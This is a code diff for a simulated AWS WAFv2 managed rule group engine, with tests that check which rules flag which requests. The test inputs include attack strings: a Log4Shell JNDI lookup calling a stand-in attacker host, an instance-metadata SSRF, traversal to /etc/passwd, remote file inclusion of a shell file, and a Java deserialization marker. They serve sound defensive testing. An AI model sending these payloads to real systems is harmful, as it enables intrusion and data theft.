+      });
+
+    // When a cookie header of exactly the limit is evaluated, and one a byte
+    // over it.
+    // Then the limit itself is allowed and a byte more is not.
+    assertArrayLength(core(cookie(10_240)), 0);
+    assertArrayEquals(core(cookie(10_241)), ["SizeRestrictions_Cookie_Header"]);
+  });
+
+  it("restricts a body to 8,192 bytes", async () => {
+    // Given the core rule set.
+    const core = await coreRuleSet();
+    const upload = simWafBrowserRequest("https://example.test/upload", {
+      method: "POST",
+    });
+
+    // When a body of exactly the limit is evaluated, and one a byte over it.
+    // Then the limit itself is allowed and a byte more is not, whether or not
+    // WAF read that far into it.
+    assertArrayLength(core(upload, new Uint8Array(8192)), 0);
+    assertArrayEquals(core(upload, new Uint8Array(8193)), [
+      "SizeRestrictions_Body",
+    ]);
+  });
+
+  it("restricts a URI path to 1,024 bytes", async () => {
+    // Given the core rule set.
+    const core = await coreRuleSet();
+    const path = (bytes: number): Request =>
+      simWafBrowserRequest(`https://example.test/${"a".repeat(bytes - 1)}`);
+
+    // When a path of exactly the limit is evaluated, and one a byte over it.
+    // Then the limit itself is allowed and a byte more is not.
+    assertArrayLength(core(path(1024)), 0);
+    assertArrayEquals(core(path(1025)), ["SizeRestrictions_URIPath"]);
+  });
+
+  it("claims a request that sends no user agent", async () => {
+    // Given the core rule set.
+    const core = await coreRuleSet();
+
+    // When a request with no User-Agent header is evaluated.
+    const missing = core(new Request("https://example.test/"));
+
+    // Then it is claimed, which is what the rule says and what surprises a
+    // test suite whose own requests send no headers.
+    assertArrayEquals(missing, ["NoUserAgent_Header"]);
+  });
+
+  it("claims a scanner by its user agent", async () => {
+    // Given the core rule set.
+    const core = await coreRuleSet();
+
+    // When a request from one of the scanners AWS names is evaluated.
+    const scanner = core(
+      new Request("https://example.test/", {
+        headers: { "user-agent": "Nessus SOAP" },
+      }),
+    );
+
+    // Then the bad bots rule claimed it.
+    assertArrayEquals(scanner, ["UserAgent_BadBots_Header"]);
+  });
+
+  it("claims a PROPFIND request", async () => {
+    // Given the known bad inputs group.
+    const known = await knownBadInputs();
+
+    // When a WebDAV method reaches an application that speaks HTTP.
+    const propfind = known(
+      simWafBrowserRequest("https://example.test/files", {
+        method: "PROPFIND",
+      }),
+    );
+
+    // Then it is claimed.
+    assertArrayEquals(propfind, ["Propfind_Method"]);
+  });
+
+  it("claims a request addressed to localhost and not one served locally", async () => {
+    // Given the known bad inputs group.
+    const known = await knownBadInputs();
+
+    // When a request addressed to localhost is evaluated, and one addressed to
+    // a simulated endpoint, which Yulin serves under `*.sim-aws.localhost`.
+    const local = known(simWafBrowserRequest("http://localhost:3000/"));
+    const simulated = known(
+      simWafBrowserRequest(
+        "http://d123.cloudfront.net.sim-aws.localhost:8080/",
+      ),
+    );
+
+    // Then the first is claimed and the second is not. The rule reads the
+    // AWS-facing hostname, so the suffix every simulated endpoint is served
+    // under does not make it block everything.
+    assertArrayEquals(local, ["Host_Localhost_Header"]);
+    assertArrayLength(simulated, 0);
+  });
+
+  it("claims a request that reaches for the instance metadata", async () => {
+    // Given the core rule set.
+    const core = await coreRuleSet();
+
+    // When a query argument names the metadata address.
+    const ssrf = core(
+      simWafBrowserRequest(
+        "https://example.test/fetch?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F",
+      ),
+    );
+
+    // Then the metadata rule claimed it first. The address is a URL with an
+    // IPv4 host as well, so the remote file inclusion rule claims it too, and
+    // a blocking group would have stopped at the first of them.
+    assertArrayEquals(ssrf, [
+      "EC2MetaDataSSRF_QueryArguments",
+      "GenericRFI_QueryArguments",
+    ]);
+  });
+
+  it("claims a JNDI lookup wherever it arrives", async () => {
+    // Given the known bad inputs group.
+    const known = await knownBadInputs();
+
+    // When a Log4Shell payload arrives in a header, and in a query string.
+    const header = known(
+      simWafBrowserRequest("https://example.test/", {
+        headers: { "x-api-version": `\${jndi:ldap://attacker.test/a}` },
+      }),
+    );
+    const query = known(
+      simWafBrowserRequest(
+        "https://example.test/?v=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.test%2Fa%7D",
+      ),
+    );
+
+    // Then each is claimed by the rule for the component it arrived in.
+    assertArrayIncludes(header, "Log4JRCE_Header");
+    assertArrayIncludes(query, "Log4JRCE_QueryString");
+  });
+
+  it("claims a path traversal and a remote file inclusion", async () => {
+    // Given the core rule set.
+    const core = await coreRuleSet();
+
+    // When a query argument climbs out of its directory, and a body names a
+    // file on another host by address.
+    const traversal = core(
+      simWafBrowserRequest(
+        "https://example.test/read?file=..%2F..%2Fetc%2Fpasswd",
+      ),
+    );
+    const inclusion = core(
+      simWafBrowserRequest("https://example.test/render", { method: "POST" }),
+      encoder.encode("template=http://192.0.2.1/shell.txt"),
+    );
+
+    // Then each is claimed. Neither reads the caller's address, so both work
+    // despite every request here coming from one client.
+    assertArrayEquals(traversal, ["GenericLFI_QueryArguments"]);
+    assertArrayEquals(inclusion, ["GenericRFI_Body"]);
+  });
+
+  it("claims a restricted extension and leaves an ordinary one alone", async () => {
+    // Given the core rule set.
+    const core = await coreRuleSet();
+
+    // When a request asks for a configuration file, and one asks for an image
+    // whose name starts the same way.
+    const restricted = core(
+      simWafBrowserRequest("https://example.test/app.ini"),
+    );
+    const image = core(simWafBrowserRequest("https://example.test/logo.png"));
+
+    // Then the extension is what decided, rather than the letters it starts
+    // with.
+    assertArrayEquals(restricted, ["RestrictedExtensions_URIPath"]);
+    assertArrayLength(image, 0);
+  });
+
+  it("claims a request for a directory that is not meant to be served", async () => {
+    // Given the known bad inputs group.
+    const known = await knownBadInputs();
+
+    // When a request asks for the deployment descriptor of a Java application.
+    const exploitable = known(
+      simWafBrowserRequest("https://example.test/WEB-INF/web.xml"),
+    );
+
+    // Then it is claimed.
+    assertArrayEquals(exploitable, ["ExploitablePaths_URIPath"]);
+  });
+
+  it("claims a serialized Java object in a body", async () => {
+    // Given the known bad inputs group.
+    const known = await knownBadInputs();
+
+    // When a body carries the base64 a Java object stream starts with.
+    const payload = known(
+      simWafBrowserRequest("https://example.test/import", { method: "POST" }),
+      encoder.encode("state=rO0ABXNy"),
+    );
+
+    // Then it is claimed.
+    assertArrayEquals(payload, ["JavaDeserializationRCE_Body"]);
+  });
+
+  it("claims an exposed administrative page and not an application's own", async () => {
+    // Given the admin protection group.
+    const admin = await labelsFrom("AWSManagedRulesAdminProtectionRuleSet");
+
+    // When a request asks for a page third-party software exposes, and one
+    // asks for an administrative path of the application's own.
+    const exposed = admin(
+      simWafBrowserRequest("https://example.test/sqlmanager/index.php"),
+    );
+    const own = admin(simWafBrowserRequest("https://example.test/admin/users"));
+
+    // Then only the first is claimed. `/admin` is nowhere in what AWS
+    // published, and blocking it here would send somebody off to work around a
+    // rule that does not exist.
+    assertArrayEquals(exposed, ["AdminProtection_URIPath"]);
+    assertArrayLength(own, 0);
+  });
+});

--- a/src/service/wafv2/managed/sim-waf-managed-group-input.ts
+++ b/src/service/wafv2/managed/sim-waf-managed-group-input.ts
@@ -1,0 +1,104 @@
+import {
+  invalidSimWafRule,
+  refuseSimWafRuleInput,
+} from "../statement/sim-waf-rule-refusals.js";
+import type {
+  SimWafManagedRuleGroupStatementInput,
+  SimWafOverrideActionInput,
+} from "./sim-waf-managed-group.type.js";
+import {
+  findSimWafManagedRuleGroup,
+  simWafManagedRuleGroupNames,
+} from "./sim-waf-managed-rule-groups.js";
+import type { SimWafManagedRuleGroupDefinition } from "./sim-waf-managed-rule.type.js";
+
+/**
+ * The rule group statement members real WAFv2 takes and this simulation does
+ * not.
+ */
+const refusedMembers = new Map<string, string>([
+  [
+    "Version",
+    "a versioned rule group is a snapshot of rules that were published on a " +
+      "date, and only the current rules are carried here",
+  ],
+  [
+    "ExcludedRules",
+    "AWS replaced it with RuleActionOverrides, which says which action a " +
+      "named rule takes rather than only that it takes none",
+  ],
+  [
+    "ManagedRuleGroupConfigs",
+    "it configures the Bot Control, account takeover and account creation " +
+      "groups, and none of those is simulated",
+  ],
+]);
+
+/**
+ * Find the simulated group a statement names, refusing any other.
+ *
+ * The refusal names the groups that are simulated, because the ones that are
+ * not are left out for reasons a reader cannot guess from the name: a group
+ * that decides by caller address sees one client for the whole simulation, and
+ * a group whose detection AWS does not describe cannot be reproduced at all.
+ */
+export function requiredSimWafManagedRuleGroup(
+  statement: SimWafManagedRuleGroupStatementInput,
+  ruleName: string,
+): SimWafManagedRuleGroupDefinition {
+  for (const [member, value] of Object.entries(statement)) {
+    const reason = refusedMembers.get(member);
+
+    if (reason !== undefined && value !== undefined) {
+      refuseSimWafRuleInput(
+        ruleName,
+        `the rule group member ${member}`,
+        reason,
+      );
+    }
+  }
+
+  const group = findSimWafManagedRuleGroup(
+    statement.VendorName,
+    statement.Name,
+  );
+
+  if (group === undefined) {
+    const named = `${String(statement.VendorName)} ${String(statement.Name)}`;
+    const simulated = simWafManagedRuleGroupNames().join(", ");
+
+    refuseSimWafRuleInput(
+      ruleName,
+      `the managed rule group ${named}`,
+      `the simulated groups are ${simulated}`,
+    );
+  }
+
+  return group;
+}
+
+/**
+ * Whether a rule group's own override action turns the whole group to counting.
+ *
+ * `None` and `Count` are the two real WAFv2 takes, and one of them is required
+ * on a rule that names a rule group. A rule with neither would be a rule with
+ * no action at all, since a rule group statement carries no `Action`.
+ */
+export function simWafGroupCountsEverything(
+  overrideAction: SimWafOverrideActionInput | undefined,
+  ruleName: string,
+): boolean {
+  if (overrideAction?.Count !== undefined) {
+    return true;
+  }
+
+  if (overrideAction?.None === undefined) {
+    invalidSimWafRule(
+      ruleName,
+      "A rule naming a rule group takes an OverrideAction of None or Count " +
+        "in place of an Action",
+    );
+  }
+
+  return false;
+}

--- a/src/service/wafv2/managed/sim-waf-managed-group-statement.ts
+++ b/src/service/wafv2/managed/sim-waf-managed-group-statement.ts
@@ -1,0 +1,99 @@
+import { compileSimWafStatement } from "../statement/sim-waf-statement.js";
+import { SimWafAction } from "../web-acl/sim-waf-action.js";
+import type {
+  SimWafRuleEvaluator,
+  SimWafRuleScope,
+} from "../web-acl/sim-waf-rule.type.js";
+import {
+  requiredSimWafManagedRuleGroup,
+  simWafGroupCountsEverything,
+} from "./sim-waf-managed-group-input.js";
+import { simWafManagedRuleOverrides } from "./sim-waf-managed-rule-overrides.js";
+import type {
+  SimWafManagedRuleGroupStatementInput,
+  SimWafOverrideActionInput,
+} from "./sim-waf-managed-group.type.js";
+import { simWafManagedRequestParts } from "./sim-waf-managed-request.js";
+
+interface SimWafManagedRuleGroupProperties {
+  readonly statement: SimWafManagedRuleGroupStatementInput;
+  readonly overrideAction: SimWafOverrideActionInput | undefined;
+  readonly ruleName: string;
+  readonly scope: SimWafRuleScope;
+}
+
+/**
+ * Compile a rule that names an AWS managed rule group.
+ *
+ * The group's rules run in the order AWS evaluates them, and the first of them
+ * whose action terminates decides the request. A rule that matches adds its
+ * label whatever action it ends up taking, which is what lets the tuning
+ * pattern work: the group runs in count mode, labels what it would have
+ * blocked, and a rule of the reader's own blocks on the label.
+ *
+ * The two overrides stack in one direction. `RuleActionOverrides` sets what a
+ * named rule does, and a group override action of `Count` then holds the whole
+ * group to counting whatever its rules were set to, so an overridden group
+ * cannot decide a request.
+ */
+export function compileSimWafManagedRuleGroup(
+  properties: SimWafManagedRuleGroupProperties,
+): SimWafRuleEvaluator {
+  const { statement, ruleName, scope } = properties;
+  const group = requiredSimWafManagedRuleGroup(statement, ruleName);
+  const overrides = simWafManagedRuleOverrides(
+    statement,
+    group,
+    ruleName,
+    scope.customResponseBodies,
+  );
+  const counting = simWafGroupCountsEverything(
+    properties.overrideAction,
+    ruleName,
+  );
+  const scopeDown =
+    statement.ScopeDownStatement === undefined
+      ? undefined
+      : compileSimWafStatement(statement.ScopeDownStatement, {
+          regexPatternSets: scope.regexPatternSets,
+          ruleName,
+        });
+
+  // Every rule in the three simulated groups blocks by default, and a group
+  // that is counting counts whatever the rule that matched was set to.
+  const blocking = SimWafAction.read({ Block: {} }, ruleName, {});
+  const counted = SimWafAction.read({ Count: {} }, ruleName, {});
+  const { managedRules } = scope;
+
+  return (request): SimWafAction | undefined => {
+    // A scope-down statement decides whether the group sees the request at
+    // all, so a request it does not claim picks up no label from the group.
+    if (scopeDown !== undefined && !scopeDown(request)) {
+      return undefined;
+    }
+
+    const parts = simWafManagedRequestParts(request);
+    const declared = managedRules.declaredMatches(request);
+    let matched = false;
+
+    for (const rule of group.rules) {
+      if (!declared.has(rule.name) && rule.detects?.(parts) !== true) {
+        continue;
+      }
+
+      request.labels.add(`${group.labelNamespace}:${rule.label}`);
+
+      const action = counting
+        ? counted
+        : (overrides.get(rule.name) ?? blocking);
+
+      if (action.isTerminating) {
+        return action;
+      }
+
+      matched = true;
+    }
+
+    return matched ? counted : undefined;
+  };
+}

--- a/src/service/wafv2/managed/sim-waf-managed-group.type.ts
+++ b/src/service/wafv2/managed/sim-waf-managed-group.type.ts
@@ -1,0 +1,39 @@
+import type { SimWafStatementInput } from "../statement/sim-waf-statement.type.js";
+import type { SimWafActionInput } from "../web-acl/sim-waf-action.type.js";
+
+/**
+ * Minimal structural WAFv2 ManagedRuleGroupStatement.
+ *
+ * The members Yulin refuses are declared here rather than left out, so a
+ * statement that names one is refused by name.
+ *
+ * https://docs.aws.amazon.com/AWSJavaScriptSDK/v3/latest/client/wafv2/Interface/ManagedRuleGroupStatement/
+ */
+export interface SimWafManagedRuleGroupStatementInput {
+  readonly VendorName?: string | undefined;
+  readonly Name?: string | undefined;
+  readonly Version?: string | undefined;
+  readonly ScopeDownStatement?: SimWafStatementInput | undefined;
+  readonly RuleActionOverrides?:
+    | readonly SimWafRuleActionOverrideInput[]
+    | undefined;
+  readonly ExcludedRules?: readonly unknown[] | undefined;
+  readonly ManagedRuleGroupConfigs?: readonly unknown[] | undefined;
+}
+
+/**
+ * One rule of a managed group set to an action of the reader's choosing.
+ */
+export interface SimWafRuleActionOverrideInput {
+  readonly Name?: string | undefined;
+  readonly ActionToUse?: SimWafActionInput | undefined;
+}
+
+/**
+ * Minimal structural WAFv2 OverrideAction, which a rule group statement
+ * carries in place of an action.
+ */
+export interface SimWafOverrideActionInput {
+  readonly None?: unknown;
+  readonly Count?: unknown;
+}

--- a/src/service/wafv2/managed/sim-waf-managed-overrides.iso.test.ts
+++ b/src/service/wafv2/managed/sim-waf-managed-overrides.iso.test.ts
@@ -1,0 +1,272 @@
+import {
+  assertArrayEquals,
+  assertArrayLength,
+  assertIdentical,
+  assertInstanceOf,
+  assertStringIncludes,
+  assertThrowsErrorAsync,
+} from "@kensio/smartass";
+import { describe, it } from "vitest";
+
+import { SimAws } from "../../aws/sim-aws.js";
+import {
+  SimWafInvalidParameterException,
+  SimWafUnsimulatedInputException,
+} from "../error/sim-wafv2.error.js";
+import {
+  simWafBrowserRequest,
+  type SimWafRequestDecision,
+  simWafWebAclDecisions,
+} from "../sim-wafv2.fixture.js";
+import { simWafRuleFactory } from "../web-acl/sim-waf-rule.factory.js";
+import { simWafManagedRuleFactory } from "../web-acl/sim-waf-rule.factory.js";
+import type { SimWafRuleInput } from "../web-acl/sim-waf-rule.type.js";
+import type { SimWafManagedRuleGroupStatementInput } from "./sim-waf-managed-group.type.js";
+
+/**
+ * A web ACL whose one rule runs the core rule set, written as the statement
+ * says.
+ */
+async function coreRuleSet(
+  statement: SimWafManagedRuleGroupStatementInput = {},
+  rule: Partial<SimWafRuleInput> = {},
+): Promise<SimWafRequestDecision> {
+  return await simWafWebAclDecisions(new SimAws().wafV2(), [
+    {
+      ...simWafManagedRuleFactory.make({ Name: "core" }),
+      ...rule,
+      Statement: {
+        ManagedRuleGroupStatement: {
+          VendorName: "AWS",
+          Name: "AWSManagedRulesCommonRuleSet",
+          ...statement,
+        },
+      },
+    },
+  ]);
+}
+
+/**
+ * Try to create a web ACL holding one rule, and answer with the refusal.
+ */
+async function refusalForRule(rule: SimWafRuleInput): Promise<Error> {
+  return await assertThrowsErrorAsync(async () => {
+    await simWafWebAclDecisions(new SimAws().wafV2(), [rule]);
+  });
+}
+
+/**
+ * Try to create a web ACL running the core rule set as the statement says, and
+ * answer with the refusal.
+ */
+async function refusalForGroup(
+  statement: SimWafManagedRuleGroupStatementInput,
+): Promise<Error> {
+  return await refusalForRule({
+    ...simWafManagedRuleFactory.make({ Name: "core" }),
+    Statement: {
+      ManagedRuleGroupStatement: {
+        VendorName: "AWS",
+        Name: "AWSManagedRulesCommonRuleSet",
+        ...statement,
+      },
+    },
+  });
+}
+
+describe("SimWafV2 managed rule group overrides", () => {
+  it("sets a named rule to count", async () => {
+    // Given the core rule set with the user agent rule set to count, which is
+    // what a team does when their own health check sends no headers.
+    const decide = await coreRuleSet({
+      RuleActionOverrides: [
+        { Name: "NoUserAgent_HEADER", ActionToUse: { Count: {} } },
+      ],
+    });
+
+    // When a request with no User-Agent header is evaluated.
+    const decision = decide(new Request("https://example.test/health"));
+
+    // Then it goes through, the group is recorded as having counted, and the
+    // label is there for a rule of the reader's own to read.
+    assertIdentical(decision.action, "ALLOW");
+    assertArrayEquals(decision.countedRuleNames, ["core"]);
+    assertArrayEquals(decision.labels, [
+      "awswaf:managed:aws:core-rule-set:NoUserAgent_Header",
+    ]);
+  });
+
+  it("leaves the rules it did not name alone", async () => {
+    // Given the core rule set with only the user agent rule set to count.
+    const decide = await coreRuleSet({
+      RuleActionOverrides: [
+        { Name: "NoUserAgent_HEADER", ActionToUse: { Count: {} } },
+      ],
+    });
+
+    // When a request with no User-Agent asks for a configuration file, which
+    // a rule further down the group claims.
+    const decision = decide(new Request("https://example.test/app.ini"));
+
+    // Then the counted rule labelled the request and the group carried on to
+    // the rule that still blocks.
+    assertIdentical(decision.action, "BLOCK");
+    assertArrayEquals(decision.labels, [
+      "awswaf:managed:aws:core-rule-set:NoUserAgent_Header",
+      "awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath",
+    ]);
+  });
+
+  it("holds the whole group to counting", async () => {
+    // Given the core rule set with the group's own override action set to
+    // count, and one rule inside it set to block.
+    const decide = await coreRuleSet(
+      {
+        RuleActionOverrides: [
+          { Name: "NoUserAgent_HEADER", ActionToUse: { Block: {} } },
+        ],
+      },
+      { OverrideAction: { Count: {} } },
+    );
+
+    // When a request that rule claims is evaluated.
+    const decision = decide(new Request("https://example.test/health"));
+
+    // Then nothing was blocked. A group override holds the group to counting
+    // whatever its rules were set to, so it cannot decide a request.
+    assertIdentical(decision.action, "ALLOW");
+    assertArrayEquals(decision.countedRuleNames, ["core"]);
+  });
+
+  it("shows a group only the requests a scope-down statement claims", async () => {
+    // Given the core rule set narrowed to the API paths.
+    const decide = await coreRuleSet({
+      ScopeDownStatement: {
+        ByteMatchStatement: {
+          SearchString: "/api/",
+          PositionalConstraint: "STARTS_WITH",
+          FieldToMatch: { UriPath: {} },
+          TextTransformations: [{ Priority: 0, Type: "NONE" }],
+        },
+      },
+    });
+
+    // When a traversal arrives inside those paths, and the same one outside
+    // them.
+    const inside = decide(
+      simWafBrowserRequest("https://example.test/api/read?file=..%2Fetc"),
+    );
+    const outside = decide(
+      simWafBrowserRequest("https://example.test/docs/read?file=..%2Fetc"),
+    );
+
+    // Then the group only saw the first. The second picked up no label at all,
+    // because the group never ran over it.
+    assertIdentical(inside.action, "BLOCK");
+    assertIdentical(outside.action, "ALLOW");
+    assertArrayLength(outside.labels, 0);
+  });
+
+  it("refuses an override naming a rule the group does not hold", async () => {
+    // When a rule group override names a rule from another group.
+    const error = await refusalForGroup({
+      RuleActionOverrides: [
+        { Name: "Log4JRCE_HEADER", ActionToUse: { Count: {} } },
+      ],
+    });
+
+    // Then it is refused. A name that matched nothing would leave the rule it
+    // meant to reach still blocking, which is the failure overrides exist to
+    // avoid.
+    assertInstanceOf(error, SimWafInvalidParameterException);
+    assertStringIncludes(error.message, "Log4JRCE_HEADER");
+  });
+
+  it("refuses a rule that names a group and carries an action", async () => {
+    // When a rule names a rule group and an action of its own.
+    const error = await refusalForRule({
+      ...simWafManagedRuleFactory.make({ Name: "core" }),
+      Action: { Block: {} },
+    });
+
+    // Then it is refused, as real WAFv2 refuses it: the action comes from the
+    // rule inside the group that claimed the request.
+    assertInstanceOf(error, SimWafInvalidParameterException);
+    assertStringIncludes(error.message, "OverrideAction");
+  });
+
+  it("refuses a rule that names a group and no override action", async () => {
+    // When a rule names a rule group with neither None nor Count.
+    const error = await refusalForRule({
+      ...simWafManagedRuleFactory.make({ Name: "core" }),
+      OverrideAction: {},
+    });
+
+    // Then it is refused rather than read as a group that overrides nothing.
+    assertInstanceOf(error, SimWafInvalidParameterException);
+    assertStringIncludes(error.message, "None or Count");
+  });
+
+  it("refuses an override action on a rule that names no group", async () => {
+    // When an ordinary rule carries an override action.
+    const error = await refusalForRule({
+      ...simWafRuleFactory.make({ Name: "block-admin" }),
+      OverrideAction: { Count: {} },
+    });
+
+    // Then it is refused: an override action applies to a rule group and
+    // there is none here to apply it to.
+    assertInstanceOf(error, SimWafInvalidParameterException);
+    assertStringIncludes(error.message, "block-admin");
+  });
+
+  it("refuses the rule group members this simulation does not model", async () => {
+    // When a rule group names a published version, excludes rules the
+    // deprecated way, or configures one of the groups that is not simulated.
+    const version = await refusalForGroup({ Version: "Version_1.9" });
+    const excluded = await refusalForGroup({
+      ExcludedRules: [{ Name: "NoUserAgent_HEADER" }],
+    });
+    const configs = await refusalForGroup({
+      ManagedRuleGroupConfigs: [{ LoginPath: "/login" }],
+    });
+
+    // Then each is refused by name, and the exclusion says what replaced it.
+    assertInstanceOf(version, SimWafUnsimulatedInputException);
+    assertStringIncludes(version.message, "Version");
+    assertStringIncludes(excluded.message, "RuleActionOverrides");
+    assertStringIncludes(configs.message, "ManagedRuleGroupConfigs");
+  });
+
+  it("refuses a rule group nested inside another statement", async () => {
+    // When a rule joins a rule group to a statement of its own.
+    const error = await refusalForRule({
+      ...simWafRuleFactory.make({ Name: "core" }),
+      Statement: {
+        AndStatement: {
+          Statements: [
+            {
+              ByteMatchStatement: {
+                SearchString: "/api/",
+                PositionalConstraint: "STARTS_WITH",
+                FieldToMatch: { UriPath: {} },
+                TextTransformations: [{ Priority: 0, Type: "NONE" }],
+              },
+            },
+            {
+              ManagedRuleGroupStatement: {
+                VendorName: "AWS",
+                Name: "AWSManagedRulesCommonRuleSet",
+              },
+            },
+          ],
+        },
+      },
+    });
+
+    // Then it is refused, as real WAFv2 refuses it. A scope-down statement is
+    // how a group is narrowed to some of the traffic.
+    assertInstanceOf(error, SimWafInvalidParameterException);
+    assertStringIncludes(error.message, "ManagedRuleGroupStatement");
+  });
+});

--- a/src/service/wafv2/managed/sim-waf-managed-request.ts
+++ b/src/service/wafv2/managed/sim-waf-managed-request.ts
@@ -1,0 +1,85 @@
+import type { SimWafInspectedRequest } from "../evaluate/sim-waf-inspected-request.js";
+import { simWafInspectionLimitBytes } from "../statement/sim-waf-field-content.js";
+import { simWafQueryArguments } from "../statement/sim-waf-request-fields.js";
+
+const encoder = new TextEncoder();
+const decoder = new TextDecoder();
+
+/**
+ * The request components an AWS managed rule inspects.
+ *
+ * A managed rule names the component it reads rather than carrying a field to
+ * match, so these are read once per request and handed to every rule in the
+ * group. The sizes are here because the four `SizeRestrictions_*` rules
+ * measure a component rather than looking inside it, and they measure bytes
+ * rather than characters.
+ */
+export interface SimWafManagedRequestParts {
+  readonly method: string;
+
+  /** The AWS-facing hostname, which `Host_localhost_HEADER` reads. */
+  readonly host: string;
+
+  readonly uriPath: string;
+  readonly queryString: string;
+
+  /** The value of each query argument, undecoded. */
+  readonly queryArguments: readonly string[];
+
+  /** The value of each header the request sent. */
+  readonly headerValues: readonly string[];
+
+  /** The User-Agent header, or nothing when the request sent none. */
+  readonly userAgent: string | undefined;
+
+  /** The whole Cookie header, as it arrived. */
+  readonly cookieHeader: string;
+
+  /** As much of the body as WAF reads, decoded as text. */
+  readonly body: string;
+
+  readonly uriPathBytes: number;
+  readonly queryStringBytes: number;
+  readonly cookieHeaderBytes: number;
+  readonly bodyBytes: number;
+}
+
+/**
+ * Read the components the managed rules inspect out of one request.
+ *
+ * The body is cut at WAF's inspection limit for the rules that look inside it,
+ * and its full size is kept beside it for `SizeRestrictions_BODY`. WAF knows
+ * how large a body is from the request whether or not it reads that far, so a
+ * body over the limit is measured rather than being reported as the limit.
+ */
+export function simWafManagedRequestParts(
+  request: SimWafInspectedRequest,
+): SimWafManagedRequestParts {
+  const cookieHeader = request.headers.get("cookie") ?? "";
+  const body = request.body ?? new Uint8Array();
+
+  return {
+    method: request.method,
+    host: request.host,
+    uriPath: request.uriPath,
+    queryString: request.queryString,
+    queryArguments: simWafQueryArguments(request.queryString).map(
+      (argument) => argument.value,
+    ),
+    headerValues: [...request.headers].map(([, value]) => value),
+    userAgent: request.headers.get("user-agent") ?? undefined,
+    cookieHeader,
+    body: decoder.decode(body.subarray(0, simWafInspectionLimitBytes)),
+    uriPathBytes: simWafByteLength(request.uriPath),
+    queryStringBytes: simWafByteLength(request.queryString),
+    cookieHeaderBytes: simWafByteLength(cookieHeader),
+    bodyBytes: body.length,
+  };
+}
+
+/**
+ * How many bytes a string takes up, which is what WAF measures a component in.
+ */
+export function simWafByteLength(value: string): number {
+  return encoder.encode(value).length;
+}

--- a/src/service/wafv2/managed/sim-waf-managed-rule-groups.iso.test.ts
+++ b/src/service/wafv2/managed/sim-waf-managed-rule-groups.iso.test.ts
@@ -1,0 +1,282 @@
+import {
+  assertArrayEquals,
+  assertArrayLength,
+  assertIdentical,
+  assertInstanceOf,
+  assertStringIncludes,
+  assertThrowsError,
+  assertThrowsErrorAsync,
+  assertTrue,
+} from "@kensio/smartass";
+import { describe, it } from "vitest";
+
+import { SimAws } from "../../aws/sim-aws.js";
+import {
+  SimWafDeclarationError,
+  SimWafUnsimulatedInputException,
+} from "../error/sim-wafv2.error.js";
+import {
+  simWafBrowserRequest,
+  simWafWebAclDecisions,
+} from "../sim-wafv2.fixture.js";
+import { simWafManagedRuleFactory } from "../web-acl/sim-waf-rule.factory.js";
+import type { SimWafRuleInput } from "../web-acl/sim-waf-rule.type.js";
+
+const coreRuleSet = "AWSManagedRulesCommonRuleSet";
+const knownBadInputs = "AWSManagedRulesKnownBadInputsRuleSet";
+const adminProtection = "AWSManagedRulesAdminProtectionRuleSet";
+
+/**
+ * A rule running one managed rule group, counting rather than blocking.
+ *
+ * Counting is what makes the whole group visible. A blocking group stops at
+ * the first rule that claims the request, and a counting one runs every rule
+ * and labels the request with each that matched.
+ */
+function countingGroup(name: string): SimWafRuleInput {
+  return {
+    ...simWafManagedRuleFactory.make(),
+    OverrideAction: { Count: {} },
+    Statement: {
+      ManagedRuleGroupStatement: { VendorName: "AWS", Name: name },
+    },
+  };
+}
+
+function blockingGroup(name: string): SimWafRuleInput {
+  return {
+    ...simWafManagedRuleFactory.make({ Name: "managed" }),
+    Statement: {
+      ManagedRuleGroupStatement: { VendorName: "AWS", Name: name },
+    },
+  };
+}
+
+describe("SimWafV2 AWS managed rule groups", () => {
+  it("accepts the three simulated groups", async () => {
+    // Given a web ACL running all three groups at once, as a stack turning WAF
+    // on tends to.
+    const waf = new SimAws().wafV2();
+    const decide = await simWafWebAclDecisions(waf, [
+      { ...blockingGroup(coreRuleSet), Name: "core", Priority: 0 },
+      { ...blockingGroup(knownBadInputs), Name: "known-bad", Priority: 1 },
+      { ...blockingGroup(adminProtection), Name: "admin", Priority: 2 },
+    ]);
+
+    // When ordinary traffic reaches it.
+    const decision = decide(
+      simWafBrowserRequest("https://example.test/pricing"),
+    );
+
+    // Then the web ACL was created and the request went through, which is the
+    // whole reason for covering these groups: a stack that turns them on
+    // deploys, and its own traffic is not blocked by the rules it turned on.
+    assertIdentical(decision.action, "ALLOW");
+    assertArrayLength(decision.labels, 0);
+  });
+
+  it("evaluates a group's rules in the order AWS documents", async () => {
+    // Given the core rule set in count mode, so every rule that claims the
+    // request gets to run.
+    const waf = new SimAws().wafV2();
+    const decide = await simWafWebAclDecisions(waf, [
+      countingGroup(coreRuleSet),
+    ]);
+
+    // When a request claimed by two of its rules is evaluated. The path holds
+    // a traversal with an encoded slash and a restricted extension, and the
+    // extension rule runs first.
+    const decision = decide(
+      simWafBrowserRequest("https://example.test/..%2fsecret.log"),
+    );
+
+    // Then the labels are in the order the group evaluated the rules, which is
+    // AWS's order and not the order the rules read in.
+    assertArrayEquals(decision.labels, [
+      "awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath",
+      "awswaf:managed:aws:core-rule-set:GenericLFI_URIPath",
+    ]);
+  });
+
+  it("blocks by the first rule of the group that claims a request", async () => {
+    // Given the core rule set as it comes, which blocks.
+    const waf = new SimAws().wafV2();
+    const decide = await simWafWebAclDecisions(waf, [
+      blockingGroup(coreRuleSet),
+    ]);
+
+    // When a request two of its rules claim is evaluated.
+    const decision = decide(
+      simWafBrowserRequest("https://example.test/..%2fsecret.log"),
+    );
+
+    // Then the first of them decided, and only its label was added: the group
+    // stopped where AWS stops. The rule that decided is the web ACL's own
+    // rule, since that is what the group was named by.
+    assertIdentical(decision.action, "BLOCK");
+    assertIdentical(decision.terminatingRuleName, "managed");
+    assertArrayEquals(decision.labels, [
+      "awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath",
+    ]);
+  });
+
+  it("labels a request from the group that claimed it", async () => {
+    // Given the known bad inputs group and the admin protection group.
+    const waf = new SimAws().wafV2();
+    const decide = await simWafWebAclDecisions(waf, [
+      { ...countingGroup(knownBadInputs), Name: "known-bad", Priority: 0 },
+      { ...countingGroup(adminProtection), Name: "admin", Priority: 1 },
+    ]);
+
+    // When a request each of them claims is evaluated.
+    const decision = decide(
+      simWafBrowserRequest("https://example.test/sqlmanager/", {
+        method: "PROPFIND",
+      }),
+    );
+
+    // Then each label names the group it came from, so a rule tuning one group
+    // can be written without reaching the other.
